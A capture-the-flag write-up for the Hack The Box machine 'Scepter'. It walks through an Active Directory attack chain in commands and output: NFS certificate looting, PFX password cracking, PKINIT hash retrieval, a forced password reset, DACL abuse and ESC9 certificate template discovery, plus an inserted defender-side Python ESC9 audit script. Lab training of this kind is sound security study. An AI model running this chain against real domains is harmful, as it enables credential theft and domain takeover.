HTB | Scepter

Machine - https://app.hackthebox.com/machines/Scepter

IP - 10.10.11.65

NMAP

└─$ nmap -sT -p- --min-rate 10000 10.10.11.65 -Pn -oA nmap_ports
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-23 18:47 IST
Warning: 10.10.11.65 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.11.65
Host is up (0.44s latency).
Not shown: 33674 closed tcp ports (conn-refused), 31841 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
111/tcp   open  rpcbind
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
636/tcp   open  ldapssl
2049/tcp  open  nfs
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
49664/tcp open  unknown
49665/tcp open  unknown
49667/tcp open  unknown
49673/tcp open  unknown
49696/tcp open  unknown
49709/tcp open  unknown
49726/tcp open  unknown
49764/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 169.44 seconds
└─$ nmap -sC -sV -p 53,88,111,135,139,445,464,636,2049,3269,5985,9389,49664,49665,49667,49673,49696,49709,49726,49764 10.10.11.65 -Pn -oA nmap_port_details
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-23 18:51 IST
Nmap scan report for 10.10.11.65
Host is up (0.63s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-06-23 21:24:31Z)
111/tcp   open  rpcbind       2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/tcp6  rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  2,3,4        111/udp6  rpcbind
|   100003  2,3         2049/udp   nfs
|   100003  2,3         2049/udp6  nfs
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100005  1,2,3       2049/tcp   mountd
|   100005  1,2,3       2049/tcp6  mountd
|   100005  1,2,3       2049/udp   mountd
|   100005  1,2,3       2049/udp6  mountd
|   100021  1,2,3,4     2049/tcp   nlockmgr
|   100021  1,2,3,4     2049/tcp6  nlockmgr
|   100021  1,2,3,4     2049/udp   nlockmgr
|   100021  1,2,3,4     2049/udp6  nlockmgr
|   100024  1           2049/tcp   status
|   100024  1           2049/tcp6  status
|   100024  1           2049/udp   status
|_  100024  1           2049/udp6  status
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: scepter.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.scepter.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.scepter.htb
| Not valid before: 2024-11-01T03:22:33
|_Not valid after:  2025-11-01T03:22:33
|_ssl-date: 2025-06-23T21:25:51+00:00; +8h02m51s from scanner time.
2049/tcp  open  nlockmgr      1-4 (RPC #100021)
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: scepter.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.scepter.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.scepter.htb
| Not valid before: 2024-11-01T03:22:33
|_Not valid after:  2025-11-01T03:22:33
|_ssl-date: 2025-06-23T21:25:52+00:00; +8h02m52s from scanner time.
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  msrpc         Microsoft Windows RPC
49696/tcp open  msrpc         Microsoft Windows RPC
49709/tcp open  msrpc         Microsoft Windows RPC
49726/tcp open  msrpc         Microsoft Windows RPC
49764/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2025-06-23T21:25:40
|_  start_date: N/A
|_clock-skew: mean: 8h02m51s, deviation: 0s, median: 8h02m50s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 464.81 seconds

Port 2049

Let’s list the NFS exports:

└─$ showmount -e 10.10.11.65
Export list for 10.10.11.65:
/helpdesk (everyone)

We can see the helpdesk export, and everyone has permission to mount it.

Foothold/shell

Shell as H.Brown

helpdesk mount

Let's mount the helpdesk share and take a look inside.

└─$ sudo mount -t nfs 10.10.11.65:/helpdesk /mnt/         

We can see a .crt and .key for baker and .pfx files for clark, lewis and scott:

└─$ sudo ls /mnt                                 
baker.crt  baker.key  clark.pfx  lewis.pfx  scott.pfx

Let’s view the certificate of baker

└─# openssl x509 -in baker.crt -text       
Certificate:
    Data:
        Version: 3 (0x2)
        Serial Number:
            62:00:00:00:32:e1:a5:c3:91:51:31:09:7b:00:00:00:00:00:32
        Signature Algorithm: sha256WithRSAEncryption
        Issuer: DC=htb, DC=scepter, CN=scepter-DC01-CA
        Validity
            Not Before: Nov  2 01:13:46 2024 GMT
            Not After : Nov  2 01:13:46 2025 GMT
        Subject: DC=htb, DC=scepter, CN=Users, CN=d.baker, emailAddress=d.baker@scepter.htb
        Subject Public Key Info:
            Public Key Algorithm: rsaEncryption
                Public-Key: (2048 bit)
                Modulus:
                    00:a5:83:8f:1c:7b:70:f0:2b:08:21:2e:a6:16:4a:
                    08:f0:2b:43:e4:8e:13:bb:7e:89:0d:23:9b:76:76:
                    19:91:9d:5e:29:6f:d5:89:fd:6b:5c:bf:4b:1f:29:
                    0a:84:96:d3:1a:e2:6c:10:34:87:2a:de:e6:62:cd:
                    2b:e3:d2:54:dc:7a:d6:d9:92:28:b2:e2:21:4a:ad:
                    b9:81:ca:a5:ef:7b:67:23:b4:68:09:cf:27:eb:35:
                    19:05:06:a2:10:96:db:5c:08:5c:28:9d:53:91:aa:
                    dc:dd:95:f7:53:d6:87:a0:a9:24:94:c2:61:c8:7d:
                    35:0f:fd:f1:bc:6b:0c:e9:76:c2:14:76:f2:dc:79:
                    a7:c2:8b:8a:a6:1f:7f:6b:b7:b6:5c:fc:a7:1e:76:
                    2f:c1:b5:37:3c:e9:09:3e:6f:8f:e3:92:a8:e6:bd:
                    7c:56:e1:0b:74:72:41:18:e5:71:f7:f6:8e:c6:a4:
                    3d:c1:4d:51:aa:2e:0e:ef:5d:5d:58:07:a7:af:cc:
                    1f:1b:42:14:20:49:b6:86:63:ca:01:f0:09:c3:e7:
                    4a:82:9b:29:7b:d4:ed:51:99:49:b3:43:38:64:b6:
                    bf:c5:d8:5d:c9:29:ab:f6:c9:eb:ca:2a:e0:49:80:
                    fd:28:4c:d6:c7:ed:0d:b2:a6:87:7e:63:35:6a:ab:
                    19:13
                Exponent: 65537 (0x10001)
        X509v3 extensions:
            X509v3 Subject Key Identifier: 
                37:94:CC:57:E3:A4:CB:55:63:1A:47:8F:83:D0:6E:50:C2:34:63:51
            X509v3 Authority Key Identifier: 
                EB:90:54:38:D2:A6:6C:89:6A:CB:6D:4D:A4:BA:75:15:60:15:27:E3
            X509v3 CRL Distribution Points: 
                Full Name:
                  URI:ldap:///CN=scepter-DC01-CA,CN=dc01,CN=CDP,CN=Public%20Key%20Services,CN=Services,CN=Configuration,DC=scepter,DC=htb?certificateRevocationList?base?objectClass=cRLDistributionPoint

            Authority Information Access: 
                CA Issuers - URI:ldap:///CN=scepter-DC01-CA,CN=AIA,CN=Public%20Key%20Services,CN=Services,CN=Configuration,DC=scepter,DC=htb?cACertificate?base?objectClass=certificationAuthority
            1.3.6.1.4.1.311.20.2: 
                ...U.s.e.r
            X509v3 Key Usage: critical
                Digital Signature, Key Encipherment
            X509v3 Extended Key Usage: 
                Microsoft Encrypted File System, E-mail Protection, TLS Web Client Authentication
            X509v3 Subject Alternative Name: 
                othername: UPN:d.baker@scepter.htb, email:d.baker@scepter.htb
            Microsoft NTDS CA Extension: 
                0<.:.
+.....7....,.*S-1-5-21-74879546-916818434-740295365-1106
            S/MIME Capabilities: 
......0...+....0050...*.H..
..*.H..
    Signature Algorithm: sha256WithRSAEncryption
    Signature Value:
        55:98:3d:9f:d8:f2:64:ac:a3:7c:e2:d6:ab:fb:26:cf:97:89:
        dd:1b:67:a4:81:de:35:11:be:d4:04:97:c0:a0:a9:da:33:2a:
        ea:ca:f3:dc:6d:34:f3:57:45:47:1a:e0:00:0d:bd:43:80:a5:
        a4:40:30:dd:cb:fd:df:b5:ea:6c:f1:7b:d0:c4:0d:6b:c1:51:
        de:eb:55:12:2b:48:bf:3c:eb:01:ab:c3:e6:08:25:01:8c:c4:
        1e:88:2a:71:c6:6e:ee:2d:da:04:14:38:c4:20:b9:fb:17:db:
        a2:94:f6:ac:4c:e9:60:ba:54:7b:a7:61:a3:9e:fb:14:be:01:
        33:04:32:56:3a:1c:27:8d:99:f8:40:fa:8b:c7:da:24:69:5d:
        6b:6e:0c:a1:12:8c:72:46:e5:92:77:a5:8a:38:7d:3e:3b:6b:
        60:ed:01:ce:31:68:df:34:10:26:87:9b:0b:5a:aa:b3:2b:22:
        2f:ad:8f:c0:17:2c:0a:da:0d:52:6d:95:31:4d:6f:cd:3e:b7:
        77:c5:f8:5b:6d:2f:6f:87:8d:c1:bc:3a:9d:6c:a7:02:a4:14:
        b9:6c:4f:7e:d0:88:57:4e:b5:ad:97:fd:5d:6b:a0:24:aa:d7:
        f1:31:84:81:d6:af:9b:b6:b6:44:31:27:17:26:47:c9:9b:6c:
        cf:b4:b5:6a
-----BEGIN CERTIFICATE-----
MIIGTDCCBTSgAwIBAgITYgAAADLhpcORUTEJewAAAAAAMjANBgkqhkiG9w0BAQsF
ADBIMRMwEQYKCZImiZPyLGQBGRYDaHRiMRcwFQYKCZImiZPyLGQBGRYHc2NlcHRl
cjEYMBYGA1UEAxMPc2NlcHRlci1EQzAxLUNBMB4XDTI0MTEwMjAxMTM0NloXDTI1
MTEwMjAxMTM0NlowdDETMBEGCgmSJomT8ixkARkWA2h0YjEXMBUGCgmSJomT8ixk
ARkWB3NjZXB0ZXIxDjAMBgNVBAMTBVVzZXJzMRAwDgYDVQQDEwdkLmJha2VyMSIw
IAYJKoZIhvcNAQkBFhNkLmJha2VyQHNjZXB0ZXIuaHRiMIIBIjANBgkqhkiG9w0B
AQEFAAOCAQ8AMIIBCgKCAQEApYOPHHtw8CsIIS6mFkoI8CtD5I4Tu36JDSObdnYZ
kZ1eKW/Vif1rXL9LHykKhJbTGuJsEDSHKt7mYs0r49JU3HrW2ZIosuIhSq25gcql
73tnI7RoCc8n6zUZBQaiEJbbXAhcKJ1Tkarc3ZX3U9aHoKkklMJhyH01D/3xvGsM
6XbCFHby3HmnwouKph9/a7e2XPynHnYvwbU3POkJPm+P45Ko5r18VuELdHJBGOVx
9/aOxqQ9wU1Rqi4O711dWAenr8wfG0IUIEm2hmPKAfAJw+dKgpspe9TtUZlJs0M4
ZLa/xdhdySmr9snryirgSYD9KEzWx+0NsqaHfmM1aqsZEwIDAQABo4IDATCCAv0w
HQYDVR0OBBYEFDeUzFfjpMtVYxpHj4PQblDCNGNRMB8GA1UdIwQYMBaAFOuQVDjS
pmyJasttTaS6dRVgFSfjMIHKBgNVHR8EgcIwgb8wgbyggbmggbaGgbNsZGFwOi8v
L0NOPXNjZXB0ZXItREMwMS1DQSxDTj1kYzAxLENOPUNEUCxDTj1QdWJsaWMlMjBL
ZXklMjBTZXJ2aWNlcyxDTj1TZXJ2aWNlcyxDTj1Db25maWd1cmF0aW9uLERDPXNj
ZXB0ZXIsREM9aHRiP2NlcnRpZmljYXRlUmV2b2NhdGlvbkxpc3Q/YmFzZT9vYmpl
Y3RDbGFzcz1jUkxEaXN0cmlidXRpb25Qb2ludDCBwQYIKwYBBQUHAQEEgbQwgbEw
ga4GCCsGAQUFBzAChoGhbGRhcDovLy9DTj1zY2VwdGVyLURDMDEtQ0EsQ049QUlB
LENOPVB1YmxpYyUyMEtleSUyMFNlcnZpY2VzLENOPVNlcnZpY2VzLENOPUNvbmZp
Z3VyYXRpb24sREM9c2NlcHRlcixEQz1odGI/Y0FDZXJ0aWZpY2F0ZT9iYXNlP29i
amVjdENsYXNzPWNlcnRpZmljYXRpb25BdXRob3JpdHkwFwYJKwYBBAGCNxQCBAoe
CABVAHMAZQByMA4GA1UdDwEB/wQEAwIFoDApBgNVHSUEIjAgBgorBgEEAYI3CgME
BggrBgEFBQcDBAYIKwYBBQUHAwIwQwYDVR0RBDwwOqAjBgorBgEEAYI3FAIDoBUM
E2QuYmFrZXJAc2NlcHRlci5odGKBE2QuYmFrZXJAc2NlcHRlci5odGIwSwYJKwYB
BAGCNxkCBD4wPKA6BgorBgEEAYI3GQIBoCwEKlMtMS01LTIxLTc0ODc5NTQ2LTkx
NjgxODQzNC03NDAyOTUzNjUtMTEwNjBEBgkqhkiG9w0BCQ8ENzA1MA4GCCqGSIb3
DQMCAgIAgDAOBggqhkiG9w0DBAICAIAwBwYFKw4DAgcwCgYIKoZIhvcNAwcwDQYJ
KoZIhvcNAQELBQADggEBAFWYPZ/Y8mSso3zi1qv7Js+Xid0bZ6SB3jURvtQEl8Cg
qdozKurK89xtNPNXRUca4AANvUOApaRAMN3L/d+16mzxe9DEDWvBUd7rVRIrSL88
6wGrw+YIJQGMxB6IKnHGbu4t2gQUOMQgufsX26KU9qxM6WC6VHunYaOe+xS+ATME
MlY6HCeNmfhA+ovH2iRpXWtuDKESjHJG5ZJ3pYo4fT47a2DtAc4xaN80ECaHmwta
qrMrIi+tj8AXLAraDVJtlTFNb80+t3fF+FttL2+HjcG8Op1spwKkFLlsT37QiFdO
ta2X/V1roCSq1/ExhIHWr5u2tkQxJxcmR8mbbM+0tWo=
-----END CERTIFICATE-----

Let’s take a look at the key

└─# cat baker.key             
Bag Attributes
    friendlyName: 
    localKeyID: DC 2B 20 65 C3 0D 91 40 E8 37 B5 CC 06 0F EA 66 5D 3B 7C 4E 
Key Attributes: <No Attributes>
-----BEGIN ENCRYPTED PRIVATE KEY-----
[encrypted key material omitted]
-----END ENCRYPTED PRIVATE KEY-----

Attempting to authenticate via PFX

Since we have the Clark, Lewis and Scott PFX files, we can try to authenticate with them.

First, convert them into hashes with pfx2john and crack them with John:

└─$ pfx2john lewis.pfx | tee -a lewishash
└─$ pfx2john clark.pfx | tee -a clarkhash
└─$ pfx2john scott.pfx| tee -a scotthash
┌──(anurag㉿anurag)-[~/htb/Scepter]
└─$ john lewishash --wordlist=/home/anurag/stuff/rockyou.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (pfx, (.pfx, .p12) [PKCS#12 PBE (SHA1/SHA2) 256/256 AVX2 8x])
Cost 1 (iteration count) is 2048 for all loaded hashes
Cost 2 (mac-type [1:SHA1 224:SHA224 256:SHA256 384:SHA384 512:SHA512]) is 256 for all loaded hashes
Will run 3 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
newpassword      (lewis.pfx)     
1g 0:00:00:00 DONE (2025-06-23 19:45) 2.173g/s 11686p/s 11686c/s 11686C/s Liverpool..ginuwine
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 
                                                                                                                                                                                                                                                                             
┌──(anurag㉿anurag)-[~/htb/Scepter]
└─$ john clarkhash --wordlist=/home/anurag/stuff/rockyou.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (pfx, (.pfx, .p12) [PKCS#12 PBE (SHA1/SHA2) 256/256 AVX2 8x])
Cost 1 (iteration count) is 2048 for all loaded hashes
Cost 2 (mac-type [1:SHA1 224:SHA224 256:SHA256 384:SHA384 512:SHA512]) is 256 for all loaded hashes
Will run 3 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
newpassword      (clark.pfx)     
1g 0:00:00:00 DONE (2025-06-23 19:45) 2.500g/s 13440p/s 13440c/s 13440C/s Liverpool..ginuwine
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 
                                                                                                                                                                                                                                                                             
┌──(anurag㉿anurag)-[~/htb/Scepter]
└─$ john scotthash --wordlist=/home/anurag/stuff/rockyou.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (pfx, (.pfx, .p12) [PKCS#12 PBE (SHA1/SHA2) 256/256 AVX2 8x])
Cost 1 (iteration count) is 2048 for all loaded hashes
Cost 2 (mac-type [1:SHA1 224:SHA224 256:SHA256 384:SHA384 512:SHA512]) is 256 for all loaded hashes
Will run 3 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
newpassword      (scott.pfx)     
1g 0:00:00:00 DONE (2025-06-23 19:46) 1.923g/s 10338p/s 10338c/s 10338C/s Liverpool..ginuwine
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

I was not able to authenticate using the Clark, Lewis and Scott PFX files.

Let’s make PFX for baker

PFX for baker

When prompted for the passphrase of baker.key, we can provide the password cracked from the clark, lewis and scott PFX files; when prompted for the export password, leave it empty.

└─$ openssl pkcs12 -export -out baker.pfx -inkey baker.key -in baker.crt                          
Enter pass phrase for baker.key:
Enter Export Password:
Verifying - Enter Export Password:

Let’s restrict the permissions on the PFX:

chmod 700 baker.pfx

Now we can use Certipy to authenticate with the PFX over PKINIT and retrieve d.baker’s NT hash:

└─$ certipy auth -pfx baker.pfx -dc-ip 10.10.11.65
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     SAN UPN: 'd.baker@scepter.htb'
[*]     Security Extension SID: 'S-1-5-21-74879546-916818434-740295365-1106'
[*] Using principal: 'd.baker@scepter.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'd.baker.ccache'
[*] Wrote credential cache to 'd.baker.ccache'
[*] Trying to retrieve NT hash for 'd.baker'
[*] Got hash for 'd.baker@scepter.htb': aad3b435b51404eeaad3b435b51404ee:18b5fb0d99e7a475316213c15b6f22ce

We can successfully authenticate with this hash:

└─$ netexec ldap 10.10.11.65 -u d.baker -H 18b5fb0d99e7a475316213c15b6f22ce
LDAP        10.10.11.65     389    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:scepter.htb)
LDAP        10.10.11.65     389    DC01             [+] scepter.htb\d.baker:18b5fb0d99e7a475316213c15b6f22ce                                                                                       

Bloodhound

Since the hash authenticates over LDAP, we can collect with bloodhound-python:

└─$ bloodhound-python -u 'd.baker' --hashes :18b5fb0d99e7a475316213c15b6f22ce -d Scepter.htb -ns 10.10.11.65 -c All --zip
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: scepter.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc01.scepter.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.scepter.htb
INFO: Found 11 users
INFO: Found 57 groups
INFO: Found 2 gpos
INFO: Found 3 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc01.scepter.htb
INFO: Done in 01M 22S
INFO: Compressing output into 20250624042828_bloodhound.zip

We can see D.BAKER@SCEPTER.HTB -> ForceChangePassword -> A.CARTER@SCEPTER.HTB

ForceChangePassword

We will change the password for a.carter

└─$ bloodyAD --host 10.10.11.65 -d scepter.htb -u d.baker -p :18b5fb0d99e7a475316213c15b6f22ce set password a.carter 'P@ssw0rd@123'
[+] Password changed successfully!
└─$ netexec smb 10.10.11.65 -u a.carter -p 'P@ssw0rd@123'
SMB         10.10.11.65     445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:scepter.htb) (signing:True) (SMBv1:False) 
SMB         10.10.11.65     445    DC01             [+] scepter.htb\a.carter:P@ssw0rd@123 

BloodHound again with the new credentials

GenericALL

We can see A.CARTER@SCEPTER.HTB -> MemberOf -> IT SUPPORT@SCEPTER.HTB -> GenericAll -> STAFF ACCESS CERTIFICATE@SCEPTER.HTB

Since IT SUPPORT already holds GenericAll over the Organizational Unit (OU) STAFF ACCESS CERTIFICATE, a.carter can grant itself full control (GenericAll) over that OU directly. With GenericAll on that OU:

  • we can modify attributes of the user objects inside it (the mail attribute in particular), which is what enables the AD CS (Active Directory Certificate Services) abuse below;

  • we can ultimately impersonate users via certificates.

A Staff Access Certificate, in the context of AD CS, is a certificate issued to individual staff members to grant them access to specific resources or applications within the organization's network. These certificates are typically used for authentication purposes, allowing staff to prove their identity and gain access to authorized areas.

└─$ bloodyAD --host 10.10.11.65 -d scepter.htb -u a.carter -p 'P@ssw0rd@123' add genericAll "OU=STAFF ACCESS CERTIFICATE,DC=SCEPTER,DC=HTB" a.carter
[+] a.carter has now GenericAll on OU=STAFF ACCESS CERTIFICATE,DC=SCEPTER,DC=HTB

ESC9

To look for AD CS vulnerabilities I ran certipy find with both a.carter’s and d.baker’s credentials; both runs report ESC9. The output below is from d.baker’s credentials:

└─$ certipy find -u d.baker -hashes :18b5fb0d99e7a475316213c15b6f22ce -target 10.10.11.65 -text -stdout -vulnerable
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 35 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 13 enabled certificate templates
[*] Finding issuance policies
[*] Found 20 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'scepter-DC01-CA' via RRP
[*] Successfully retrieved CA configuration for 'scepter-DC01-CA'
[*] Checking web enrollment for CA 'scepter-DC01-CA' @ 'dc01.scepter.htb'
[!] Error checking web enrollment: [Errno 111] Connection refused
[!] Use -debug to print a stacktrace
[!] Error checking web enrollment: [Errno 111] Connection refused
[!] Use -debug to print a stacktrace
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : scepter-DC01-CA
    DNS Name                            : dc01.scepter.htb
    Certificate Subject                 : CN=scepter-DC01-CA, DC=scepter, DC=htb
    Certificate Serial Number           : 716BFFE1BE1CD1A24010F3AD0E350340
    Certificate Validity Start          : 2024-10-31 22:24:19+00:00
    Certificate Validity End            : 2061-10-31 22:34:19+00:00
    Web Enrollment
      HTTP
        Enabled                         : False
      HTTPS
        Enabled                         : False
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Active Policy                       : CertificateAuthority_MicrosoftDefault.Policy
    Permissions
      Owner                             : SCEPTER.HTB\Administrators
      Access Rights
        ManageCa                        : SCEPTER.HTB\Administrators
                                          SCEPTER.HTB\Domain Admins
                                          SCEPTER.HTB\Enterprise Admins
        ManageCertificates              : SCEPTER.HTB\Administrators
                                          SCEPTER.HTB\Domain Admins
                                          SCEPTER.HTB\Enterprise Admins
        Enroll                          : SCEPTER.HTB\Authenticated Users
Certificate Templates
  0
    Template Name                       : StaffAccessCertificate
    Display Name                        : StaffAccessCertificate
    Certificate Authorities             : scepter-DC01-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : False
    Certificate Name Flag               : SubjectAltRequireEmail
                                          SubjectRequireDnsAsCn
                                          SubjectRequireEmail
    Enrollment Flag                     : AutoEnrollment
                                          NoSecurityExtension
    Extended Key Usage                  : Client Authentication
                                          Server Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 2
    Validity Period                     : 99 years
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Template Created                    : 2024-11-01T02:29:00+00:00
    Template Last Modified              : 2024-11-01T09:00:54+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : SCEPTER.HTB\staff
      Object Control Permissions
        Owner                           : SCEPTER.HTB\Enterprise Admins
        Full Control Principals         : SCEPTER.HTB\Domain Admins
                                          SCEPTER.HTB\Local System
                                          SCEPTER.HTB\Enterprise Admins
        Write Owner Principals          : SCEPTER.HTB\Domain Admins
                                          SCEPTER.HTB\Local System
                                          SCEPTER.HTB\Enterprise Admins
        Write Dacl Principals           : SCEPTER.HTB\Domain Admins
                                          SCEPTER.HTB\Local System
                                          SCEPTER.HTB\Enterprise Admins
    [+] User Enrollable Principals      : SCEPTER.HTB\staff
    [!] Vulnerabilities
      ESC9                              : Template has no security extension.
    [*] Remarks
      ESC9                              : Other prerequisites may be required for this to be exploitable. See the wiki for more details.

a.carter has GenericAll on the Staff Access Certificate OU, and the template shows both

Enrollment Flag : NoSecurityExtension
Certificate Name Flag : SubjectAltRequireEmail

so certificates issued from it carry no SID security extension and get their SAN from the enrollee’s mail attribute. The identity in such a certificate is therefore decided purely by the mail value on the enrolling account, which is exactly what ESC9 abuses.
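As an added defender-side example (not from the original write-up), here is a Python audit that parses the template listing of `certipy find -text` as shown above and flags templates meeting the ESC9 preconditions seen on StaffAccessCertificate: NoSecurityExtension set, client authentication allowed, manager approval off, and the SAN derived from AD attributes rather than supplied by the enrollee. The sample input is constructed: template 0 is copied from this page's output, template 1 ("User") is made up as a non-vulnerable control.

```python
import re

# Constructed sample input: template 0 is copied from the `certipy find -text`
# output in this write-up (trimmed to the relevant fields); template 1 ("User")
# is made up here as a non-vulnerable control case.
SAMPLE = r"""Certificate Templates
  0
    Template Name                       : StaffAccessCertificate
    Enabled                             : True
    Client Authentication               : True
    Enrollee Supplies Subject           : False
    Certificate Name Flag               : SubjectAltRequireEmail
                                          SubjectRequireDnsAsCn
                                          SubjectRequireEmail
    Enrollment Flag                     : AutoEnrollment
                                          NoSecurityExtension
    Requires Manager Approval           : False
    Authorized Signatures Required      : 0
    Permissions
      Enrollment Permissions
        Enrollment Rights               : SCEPTER.HTB\staff
  1
    Template Name                       : User
    Enabled                             : True
    Client Authentication               : True
    Enrollee Supplies Subject           : False
    Certificate Name Flag               : SubjectAltRequireEmail
                                          SubjectAltRequireUpn
    Enrollment Flag                     : AutoEnrollment
    Requires Manager Approval           : False
    Permissions
      Enrollment Permissions
        Enrollment Rights               : SCEPTER.HTB\Domain Users
"""

# "    Key                : value" lines, optionally prefixed by a certipy
# marker such as "[+] " or "[!] "
KEY_VALUE = re.compile(r"^\s+(?:\[[!+*]\]\s+)?(.+?)\s+:\s(.*)$")


def parse_templates(text):
    """Parse the 'Certificate Templates' section of `certipy find -text` output
    into one {field: [values]} dict per template. Multi-valued fields continue
    on following lines that certipy indents under the value column."""
    templates, current, last_key = [], None, None
    lines = text.splitlines()
    if "Certificate Templates" not in lines:
        return templates
    for line in lines[lines.index("Certificate Templates") + 1:]:
        if not line.strip():
            continue
        if re.fullmatch(r"\s*\d+", line):            # "  0", "  1": next template
            current, last_key = {}, None
            templates.append(current)
            continue
        if current is None:
            continue
        m = KEY_VALUE.match(line)
        if m:
            last_key = m.group(1)
            current[last_key] = [m.group(2).strip()]
        elif last_key and len(line) - len(line.lstrip()) >= 20:
            current[last_key].append(line.strip())   # continuation value
    return templates


def esc9_candidates(templates):
    """Return (template name, enrollment rights) for enabled templates that issue
    client-authentication certificates without the szOID_NTDS_CA_SECURITY_EXT
    SID extension and take the SAN from AD attributes (mail/UPN/DNS) rather than
    from the request. The KDC can then only match such a certificate to an
    account by name, so anyone able to write those attributes on a target
    account can obtain a certificate that authenticates as it (ESC9).
    Fix: clear CT_FLAG_NO_SECURITY_EXTENSION (0x80000) in msPKI-Enrollment-Flag
    and set StrongCertificateBindingEnforcement=2 on the DCs (KB5014754)."""
    hits = []
    for t in templates:
        if t.get("Enabled") != ["True"]:
            continue
        if "NoSecurityExtension" not in t.get("Enrollment Flag", []):
            continue
        if t.get("Client Authentication") != ["True"]:
            continue
        if t.get("Enrollee Supplies Subject") == ["True"]:
            continue                                   # ESC1 territory, not ESC9
        if t.get("Requires Manager Approval") == ["True"]:
            continue
        if not any(f.startswith("SubjectAltRequire")
                   for f in t.get("Certificate Name Flag", [])):
            continue
        hits.append((t["Template Name"][0], t.get("Enrollment Rights", [])))
    return hits


if __name__ == "__main__":
    for name, rights in esc9_candidates(parse_templates(SAMPLE)):
        print(f"ESC9 candidate: {name} (enrollable by {', '.join(rights)})")
```

Certipy's own ESC9 remark still applies: the template flag alone is not enough, the KDC must also accept name-based (non-SID) binding for the abuse to work.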

Since a.carter has GenericAll on STAFF ACCESS CERTIFICATE@SCEPTER.HTB and we want that control to reach d.baker, whose account sits inside the STAFF ACCESS CERTIFICATE OU, we can use impacket-dacledit with -inheritance so that the FullControl ACE is inherited by the OU’s child objects, giving us full control over d.baker.

└─$ impacket-dacledit -action write -rights FullControl -principal a.carter -target-dn 'OU=Staff Access Certificate,DC=scepter,DC=htb' -dc-ip 10.10.11.65 specter.htb/a.carter:'P@ssw0rd@123' -inheritance
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] NB: objects with adminCount=1 will no inherit ACEs from their parent container/OU
[*] DACL backed up to dacledit-20250624-195325.bak
[*] DACL modified successfully!

Comparison of the two ways of granting the right:

Feature                    | bloodyAD GenericAll         | impacket-dacledit with -inheritance
---------------------------|-----------------------------|---------------------------------------------------
Affects Only Target Object | ✅ Yes                      | ✅ Yes
Affects Child Objects      | ❌ No                       | ✅ Yes (if -inheritance used and not blocked)
Grants Access Type         | GenericAll (standard right) | Custom ACL entry (FullControl, but customizable)
Method Used                | Direct AD right via DACL    | Explicit ACL modification via DACL
